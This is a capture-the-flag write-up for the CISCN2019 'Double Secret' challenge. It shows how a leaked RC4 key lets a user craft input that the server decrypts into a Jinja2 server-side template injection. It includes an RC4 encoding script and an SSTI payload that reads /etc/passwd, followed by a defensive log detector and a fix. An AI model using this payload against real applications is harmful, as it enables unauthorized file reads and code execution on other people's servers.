[CISCN2019 华东南赛区]Double Secret

Author: const27  Categories: All, SSTI vulnerabilities, Miscellaneous security issues  Published: 2020-06-26 12:32

Key points: RC4 decryption, SSTI

Once you get in, you will certainly have reached this step:

When the secret string is longer than 4 characters an error is raised, and on the error page we see this:

render_template_string, which means SSTI may be possible. At the same time, the string passed in via secret is RC4-encrypted here, and the key itself is exposed. Because RC4 is a plain keystream XOR, encryption and decryption are the same operation: we only need to RC4-decrypt the value we want to pass with that key, send the result in so the server "encrypts" it back into our original value, which is then handed to render_template_string and triggers the SSTI.

RC4 decryption script:

import base64
from urllib import parse

def rc4_main(key="init_key", message="init_message"):  # returns the encrypted content
    s_box = rc4_init_sbox(key)
    crypt = str(rc4_excrypt(message, s_box))
    return crypt

def rc4_init_sbox(key):
    # RC4 key-scheduling algorithm: build the 256-entry S-box from the key
    s_box = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    return s_box

def rc4_excrypt(plain, box):
    # RC4 keystream generation XORed with the input; the same routine
    # both encrypts and decrypts, which is what this challenge relies on
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(ord(s) ^ k))
    cipher = "".join(res)
    return str(base64.b64encode(cipher.encode('utf-8')), 'utf-8')

key = "HereIsTreasure"  # the RC4 key leaked by the error page
message = input("请输入明文:\n")
enc_base64 = rc4_main(key, message)
enc_init = str(base64.b64decode(enc_base64), 'utf-8')
enc_url = parse.quote(enc_init)
print("rc4加密后的url编码:" + enc_url)

The rest is just SSTI. The SSTI payload is also very simple; it was added long ago to my
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}{% endif %}{% endfor %}
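The property the whole chain rests on is that the server's RC4 "encryption" of an attacker-supplied value is really a decryption. From the defender's side the same property makes the abuse easy to spot in access logs: apply RC4 with the exposed key to each logged secret parameter and check whether Jinja2 delimiters reach the renderer. This is an added example, not code from the challenge; the /secret path, the log format and the sample lines are constructed assumptions, while the key and the secret parameter name come from the write-up.

```python
import re
from urllib.parse import quote_from_bytes, unquote_to_bytes

KEY = b"HereIsTreasure"  # key as exposed by the challenge's error page

def rc4(key: bytes, data: bytes) -> bytes:
    # Raw RC4 keystream XOR. XOR is its own inverse, so rc4(k, rc4(k, m)) == m:
    # the server's "encrypt" step decrypts whatever the client already encrypted.
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)

TEMPLATE_DELIMS = re.compile(rb"\{\{|\{%")  # Jinja2 expression / statement openers

def rendered_source(secret_param: str) -> bytes:
    # What reaches render_template_string: URL-decoded 'secret', then RC4 with KEY.
    return rc4(KEY, unquote_to_bytes(secret_param.replace("+", " ")))

def flag_log(lines):
    # Return (line_no, decoded_source) for requests whose decoded secret carries
    # template delimiters, i.e. text the renderer would execute rather than print.
    hits = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST) [^ ?]*\?([^ "]*) HTTP', line)
        if not m:
            continue
        for pair in m.group(1).split("&"):
            name, _, value = pair.partition("=")
            if name == "secret" and TEMPLATE_DELIMS.search(rendered_source(value)):
                hits.append((n, rendered_source(value)))
    return hits

def _enc(plain: bytes) -> str:
    # Client-side RC4 + URL-encoding (what the page's script does), used to build samples.
    return quote_from_bytes(rc4(KEY, plain), safe="")

# Constructed sample access-log lines (hypothetical /secret endpoint): one benign value, one template expression.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Jun/2020:12:32:00 +0800] "GET /secret?secret=%s HTTP/1.1" 200 1' % _enc(b"hello"),
    '10.0.0.7 - - [26/Jun/2020:12:33:10 +0800] "GET /secret?secret=%s HTTP/1.1" 500 2' % _enc(b"{{ 7*7 }}"),
]
```

The real fix on the server side is not a better key but never passing user-derived text as template source: render a fixed template and pass the value as a variable instead.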
